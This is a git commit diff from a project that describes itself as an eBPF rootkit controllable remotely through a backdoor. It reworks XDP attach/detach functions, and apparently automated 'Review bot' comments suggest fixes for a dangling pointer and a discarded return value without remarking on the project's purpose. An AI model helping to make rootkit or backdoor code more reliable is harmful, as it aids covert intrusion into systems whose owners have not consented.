Capability of attaching/detaching as many times as we want is finished. Now the rootkit is fully customizable from userland (and thus remotely through the backdoor).

This commit is contained in:
h3xduck
2022-01-02 16:02:23 -05:00
parent adaf909781
commit 40da6b300b
4 changed files with 6 additions and 36 deletions




@@ -37,7 +37,8 @@ int attach_xdp_all(struct xdp_filter_bpf *skel, __u32 ifindex, __u32 flags){
// Attach loaded xdp program
skel->links.xdp_receive = bpf_program__attach_xdp(skel->progs.xdp_receive, ifindex);
err = libbpf_get_error(skel->links.xdp_receive);
err = libbpf_get_error(skel->links.xdp_receive);
if (err<0) {
fprintf(stderr, "Failed to attach XDP program\n");
return -1;
@@ -46,10 +47,9 @@ int attach_xdp_all(struct xdp_filter_bpf *skel, __u32 ifindex, __u32 flags){
return 0;
}
int detach_xdp_all(__u32 ifindex, __u32 fd, __u32 flags){
int err = bpf_set_link_xdp_fd(ifindex, fd, flags);
int detach_xdp_all(struct xdp_filter_bpf *skel){
int err = bpf_link__destroy(skel->links.xdp_receive);
if(err<0){
perror("j");
fprintf(stderr, "Failed to detach XDP program\n");
return -1;
}
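Review bot: detach_xdp_all destroys the link but leaves `skel->links.xdp_receive` pointing at freed memory, so any later teardown that walks `skel->links` (as the generated `xdp_filter_bpf__destroy` does in libbpf skeletons) operates on a dangling pointer — plausibly why the destroy call in main is commented out in this same commit. Set the slot to NULL right after the destroy, `skel->links.xdp_receive = NULL;`, so the skeleton's own cleanup sees an empty slot and a repeated detach is safe, which is what this commit is after. The `perror("j")` on the failure path is debug residue that prints whatever errno happens to hold; drop it or give it a meaningful prefix. In attach_xdp_all, `err = libbpf_get_error(skel->links.xdp_receive);` appears twice back to back and one copy is enough. attach_xdp_all starts before the first hunk.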


@@ -228,45 +228,15 @@ int main(int argc, char**argv){
perror("ERR");
goto cleanup;
}
printf("A:%i", err);fflush(stdout);
detach_xdp_all(ifindex, -1, flags);
sleep(2);
err = attach_sched_all(skel);
detach_xdp_all(skel);
if(err<0){
perror("ERR");
goto cleanup;
}
printf("B:%i", err);fflush(stdout);
exiting = false;
while (!exiting) {
err = ring_buffer__poll(rb, 100 /* timeout, ms */);
//Checking if a signal occured
if (err == -EINTR) {
err = 0;
break;
}
if (err < 0) {
printf("Error polling ring buffer: %d\n", err);
break;
}
}
err = detach_sched_all(skel);
if(err<0){
perror("ERR");
goto cleanup;
}
printf("C:%i", err);fflush(stdout);
sleep(2);
cleanup:
ring_buffer__free(rb);
xdp_filter_bpf__destroy(skel);
//xdp_filter_bpf__destroy(skel);
return err < 0 ? -err : 0;
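Review bot: The return value of the new `detach_xdp_all(skel);` call is discarded, so the `if(err<0)` that follows tests whatever `err` held from the previous call and a failed detach is silently ignored; it should read `err = detach_xdp_all(skel);`. Commenting out `xdp_filter_bpf__destroy(skel);` in cleanup leaves the loaded programs, maps and link to be reclaimed only at process exit — if that was done to avoid a crash from a link already destroyed inside detach_xdp_all, the fix belongs there (clearing the link slot after destroy), and the destroy call here should be restored. The `printf("A:%i", err);` / `B` / `C` traces print without a newline and look like leftover debugging. main starts before this hunk.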